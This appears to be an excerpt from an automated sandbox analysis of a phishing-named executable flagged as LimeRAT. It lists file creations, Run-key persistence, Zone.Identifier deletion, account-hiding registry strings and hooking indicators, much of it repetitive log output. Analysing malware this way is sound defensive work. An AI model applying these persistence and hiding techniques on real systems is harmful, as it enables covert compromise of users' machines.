Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpClient.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\NisSrv.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ka-GE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MsMpLics.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\te-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ms-MY\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mi-NZ\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gu-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mt-MT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetours.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\or-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ga-IE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCopyAccelerator.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\km-KH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\eu-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ug-CN\mpuxagent.dll.mui

Boot Survival:

Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tKZVPq
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 42_2_00007FF650CEB0C8

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe:Zone.Identifier read attributes | delete
Contains functionality to hide user accounts
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: \microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\*>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\*>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\*(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\*/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\*>HKLM\Software\Microsoft\Windows Defender Security Center\*\\*-HKCU\SOFTWARE\MICROSOFT\INTERNET 
EXPLORER\\*-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Stores large binary data to the registry
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Key value created or modified: HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
